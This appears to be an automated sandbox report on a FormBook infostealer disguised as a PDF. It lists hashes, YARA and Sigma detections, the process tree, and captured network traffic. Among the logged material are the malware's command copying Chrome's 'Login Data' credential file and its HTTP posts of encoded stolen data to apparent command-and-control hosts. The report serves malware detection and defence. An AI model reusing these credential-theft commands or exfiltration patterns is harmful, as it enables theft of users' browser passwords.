Loading ...

Play interactive tourEdit tour

Analysis Report #Uc5f0#Uc554_190304,pdf.exe

Overview

General Information

Sample Name:#Uc5f0#Uc554_190304,pdf.exe
MD5:5f42c48fa893d3787fbab422292c76c3
SHA1:d017e2ed84d8110bc6e1f8620715ede6da186cd9
SHA256:c67708cd06644c1fda26e6c0e4cfaaddf15634e8288ae451824c3083155a5192

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • #Uc5f0#Uc554_190304,pdf.exe (PID: 5324 cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: 5F42C48FA893D3787FBAB422292C76C3)
    • #Uc5f0#Uc554_190304,pdf.exe (PID: 5160 cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: 5F42C48FA893D3787FBAB422292C76C3)
      • explorer.exe (PID: 2864 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • chkdsk.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5328 cmdline: /c del 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 604 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • e2kdixix4hi0i2.exe (PID: 936 cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe MD5: 5F42C48FA893D3787FBAB422292C76C3)
          • e2kdixix4hi0i2.exe (PID: 4988 cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe MD5: 5F42C48FA893D3787FBAB422292C76C3)
        • NETSTAT.EXE (PID: 1512 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18449:$sqlite3step: 68 34 1C 7B E1
      • 0x1855c:$sqlite3step: 68 34 1C 7B E1
      • 0x18478:$sqlite3text: 68 38 2A 90 C5
      • 0x1859d:$sqlite3text: 68 38 2A 90 C5
      • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 43 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17649:$sqlite3step: 68 34 1C 7B E1
        • 0x1775c:$sqlite3step: 68 34 1C 7B E1
        • 0x17678:$sqlite3text: 68 38 2A 90 C5
        • 0x1779d:$sqlite3text: 68 38 2A 90 C5
        • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18449:$sqlite3step: 68 34 1C 7B E1
          • 0x1855c:$sqlite3step: 68 34 1C 7B E1
          • 0x18478:$sqlite3text: 68 38 2A 90 C5
          • 0x1859d:$sqlite3text: 68 38 2A 90 C5
          • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 43 entries

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\chkdsk.exe, ParentImage: C:\Windows\SysWOW64\chkdsk.exe, ParentProcessId: 4804, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 604
          Sigma detected: File Created with System Process NameShow sources
          Source: File createdAuthor: Sander Wiebing: Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 2864, TargetFilename: C:\Users\user\AppData\Local\Temp\Lp4ml

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exeVirustotal: Detection: 30%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: #Uc5f0#Uc554_190304,pdf.exeVirustotal: Detection: 30%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: #Uc5f0#Uc554_190304,pdf.exeJoe Sandbox ML: detected
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_004083DC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_004083DC
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_00405088 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405088

          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 4x nop then push 004659A0h0_2_0045E23C
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 4x nop then push 00000000h0_2_0045E23C
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 4x nop then call 00406074h0_2_004659F4
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 4x nop then push 00000000h0_2_004659F4

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH+oaVijRcBtEnjxc5iWZQM7UUOD057V&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.sweetandsunny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6dk/?4hG=pg/jUtKomc/L4vhxH/kMeK3wbZstWx/FEKb2uJAMbWIhCvL1z2faZ29JSnFivOU2cy63&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.elizavetakalinina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /6dk/ HTTP/1.1Host: www.elizavetakalinina.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.elizavetakalinina.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elizavetakalinina.com/6dk/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 47 3d 68 43 7a 5a 4b 4e 28 49 36 70 6d 39 74 4e 6b 6b 52 4a 4a 48 50 61 62 54 4e 62 51 65 56 31 6e 35 59 5f 4b 4a 39 70 38 79 54 47 55 64 4f 37 4b 75 36 54 65 66 62 7a 51 32 50 6b 39 70 68 65 34 36 55 52 33 6e 57 55 30 4c 67 68 47 4c 5a 6e 7a 41 45 35 67 55 44 6e 47 6b 74 73 53 48 50 41 51 4e 69 31 6b 6a 78 6d 75 5a 73 75 7a 75 6e 51 53 67 4e 61 44 67 62 44 33 39 71 4d 48 72 51 51 6a 2d 67 4b 7a 56 30 6b 6b 31 30 50 61 7a 39 36 79 62 6e 4c 39 7a 68 62 76 32 35 73 66 72 34 2d 56 49 38 73 71 39 4b 71 65 52 42 6b 35 41 41 56 72 43 6c 68 5a 42 53 5f 28 5f 48 76 32 4b 4a 4a 4b 68 52 79 59 58 65 50 69 51 59 72 51 51 44 4a 51 6b 66 5a 30 37 63 73 55 35 36 44 50 79 75 62 31 68 4d 71 74 47 47 39 4e 72 6f 53 55 57 4d 6d 38 52 38 7a 54 4e 63 69 79 4a 6b 67 58 53 6d 75 47 35 4f 32 77 65 6f 55 4a 31 6e 57 35 56 59 63 6b 73 32 54 30 36 66 35 43 68 49 78 50 74 78 47 4b 74 6a 31 66 68 62 70 44 37 4f 7a 45 4b 72 32 6a 63 69 63 4d 39 4c 38 4d 57 4f 64 4e 4c 4f 70 43 53 54 49 47 4b 6f 6f 7a 44 6f 78 55 33 75 4f 31 59 6a 59 48 56 34 33 35 57 7e 47 59 79 4d 30 39 7a 44 54 45 76 42 68 73 64 48 55 6a 4d 6f 70 6a 6a 59 47 74 59 63 6e 38 37 6b 55 59 54 70 54 70 50 36 47 50 69 47 79 6d 5f 77 49 74 4d 6e 45 46 41 73 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ).
          Source: global trafficHTTP traffic detected: POST /6dk/ HTTP/1.1Host: www.elizavetakalinina.comConnection: closeContent-Length: 158229Cache-Control: no-cacheOrigin: http://www.elizavetakalinina.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elizavetakalinina.com/6dk/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 47 3d 68 43 7a 5a 4b 4a 6a 36 38 4a 79 73 6e 63 49 76 51 61 34 4b 42 61 50 52 62 49 30 42 54 69 53 41 52 50 6d 6a 39 70 4d 75 49 56 63 31 4b 62 61 75 38 56 69 59 56 7a 51 78 4a 6b 39 71 6c 65 6b 47 58 44 33 5f 57 52 59 74 67 68 7e 45 41 52 66 50 45 70 67 44 42 48 37 66 76 73 47 41 50 44 6b 34 69 58 6f 37 36 47 53 5a 6f 65 72 67 37 69 37 79 4b 59 6e 76 46 6a 37 34 6e 73 75 74 51 67 50 76 67 6f 4f 79 69 77 38 7a 6c 4f 65 6b 67 4b 43 6a 78 38 42 67 74 72 72 78 38 76 6a 30 39 66 5a 4d 28 74 72 41 55 5f 6d 53 4c 30 42 4f 46 57 66 77 7a 6b 39 38 55 76 76 4e 48 73 48 5f 54 4b 65 30 56 30 64 61 62 36 4b 32 41 50 6f 53 4a 61 35 33 62 61 63 4b 50 39 45 47 31 68 57 75 6b 76 4e 34 4e 70 56 77 49 39 6b 64 71 6e 38 67 48 30 6b 35 73 55 44 46 65 69 43 32 74 43 33 42 7a 4e 4f 78 43 53 55 43 6c 55 49 52 68 57 35 5a 58 38 55 55 7a 68 5a 32 59 70 79 44 49 33 72 36 6d 46 65 4f 67 32 71 53 47 38 37 41 4e 48 42 46 6b 67 6d 6c 6e 4b 41 32 4d 4d 6f 59 54 74 4d 58 42 50 7e 4d 54 49 48 78 6f 70 7a 6c 70 41 41 33 76 63 4d 47 69 5f 72 6a 36 33 34 55 35 58 30 38 46 6b 77 6f 44 54 73 76 44 55 49 37 48 6e 7a 4d 35 6f 54 6b 59 6a 52 59 59 58 38 37 69 55 5a 6a 34 42 74 44 6c 33 6e 57 4f 6a 53 71 28 2d 34 38 6e 48 51 5a 37 56 48 35 69 4c 59 67 49 44 35 59 46 31 72 6d 46 52 68 75 68 79 58 78 45 72 73 70 78 46 6e 54 4f 69 4f 69 45 45 6f 6d 48 38 54 47 41 4b 75 72 72 53 65 31 70 41 6c 70 35 43 73 53 64 63 53 6e 51 47 58 58 41 35 35 70 7a 5a 32 5a 6d 33 77 6a 62 52 61 51 39 30 53 70 33 2d 73 32 69 53 74 50 74 79 34 5a 72 6c 52 6a 6a 72 48 6d 34 38 64 36 67 72 59 35 32 55 76 34 37 56 4c 78 43 4b 47 74 34 66 4e 5f 51 4f 64 31 46 61 6e 63 55 5a 74 66 56 6f 32 77 68 2d 51 6e 69 33 48 50 78 43 6d 6a 66 76 77 53 68 43 47 55 53 65 76 63 30 6e 4f 76 7e 43 67 66 4f 51 34 50 55 36 79 64 35 47 36 49 6d 31 48 63 5a 46 36 69 36 46 63 49 45 4f 30 46 58 55 6a 35 4d 51 62 30 72 6d 7e 53 62 4a 4c 4a 47 47 72 5f 30 61 4c 67 78 56 6d 31 4b 6b 6b 36 74 4f 68 61 6a 4c 36 39 53 30 4a 6b 64 46 37 42 50 64 28 55 78 6a 30 47 4a 55 4c 34 6b 66 64 57 78 58 42 62 4f 4f 30 41 43 48 72 5f 6a 57 42 49 76 6f 67 56 32 31 34 34 78 45 28 34 66 49 59 72 69 31 63 5f 53 61 62 74 77 42 42 6f 78 7a 6f 78 73 4b 36 30 30 62 6c 6c 46 37 56 53 48 77 38 75 53 4a 45 52 69 5f 52 72 63 51 64 66 6b 69 47 55 33 62 54 57 69 46 34 72 32 36 35 56 55 50 52 74 43 4d 47 6d 4e 57 37 41 6d 30 5a 71 6a 6a 71 4e 67 46 6a 61 6f 7a 30 78 71 57 54 63 5a 6b 49 47 62 57 4d 50 41 6e 45 77 7a 39 76 73 4d 2d 77 6c 48 73 6c 46 43 2d 4f 52 36 62 69 32 35 4f 62 36 6a 5a 6d 72 75 4c 45 42 37 37 52 66 58 46 71 5a 41 6b 7e 74 6c 7
          Source: global trafficHTTP traffic detected: GET /6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH+oaVijRcBtEnjxc5iWZQM7UUOD057V&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.sweetandsunny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6dk/?4hG=pg/jUtKomc/L4vhxH/kMeK3wbZstWx/FEKb2uJAMbWIhCvL1z2faZ29JSnFivOU2cy63&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.elizavetakalinina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.caishenhou.com
          Source: unknownHTTP traffic detected: POST /6dk/ HTTP/1.1Host: www.elizavetakalinina.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.elizavetakalinina.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elizavetakalinina.com/6dk/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 47 3d 68 43 7a 5a 4b 4e 28 49 36 70 6d 39 74 4e 6b 6b 52 4a 4a 48 50 61 62 54 4e 62 51 65 56 31 6e 35 59 5f 4b 4a 39 70 38 79 54 47 55 64 4f 37 4b 75 36 54 65 66 62 7a 51 32 50 6b 39 70 68 65 34 36 55 52 33 6e 57 55 30 4c 67 68 47 4c 5a 6e 7a 41 45 35 67 55 44 6e 47 6b 74 73 53 48 50 41 51 4e 69 31 6b 6a 78 6d 75 5a 73 75 7a 75 6e 51 53 67 4e 61 44 67 62 44 33 39 71 4d 48 72 51 51 6a 2d 67 4b 7a 56 30 6b 6b 31 30 50 61 7a 39 36 79 62 6e 4c 39 7a 68 62 76 32 35 73 66 72 34 2d 56 49 38 73 71 39 4b 71 65 52 42 6b 35 41 41 56 72 43 6c 68 5a 42 53 5f 28 5f 48 76 32 4b 4a 4a 4b 68 52 79 59 58 65 50 69 51 59 72 51 51 44 4a 51 6b 66 5a 30 37 63 73 55 35 36 44 50 79 75 62 31 68 4d 71 74 47 47 39 4e 72 6f 53 55 57 4d 6d 38 52 38 7a 54 4e 63 69 79 4a 6b 67 58 53 6d 75 47 35 4f 32 77 65 6f 55 4a 31 6e 57 35 56 59 63 6b 73 32 54 30 36 66 35 43 68 49 78 50 74 78 47 4b 74 6a 31 66 68 62 70 44 37 4f 7a 45 4b 72 32 6a 63 69 63 4d 39 4c 38 4d 57 4f 64 4e 4c 4f 70 43 53 54 49 47 4b 6f 6f 7a 44 6f 78 55 33 75 4f 31 59 6a 59 48 56 34 33 35 57 7e 47 59 79 4d 30 39 7a 44 54 45 76 42 68 73 64 48 55 6a 4d 6f 70 6a 6a 59 47 74 59 63 6e 38 37 6b 55 59 54 70 54 70 50 36 47 50 69 47 79 6d 5f 77 49 74 4d 6e 45 46 41 73 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ).
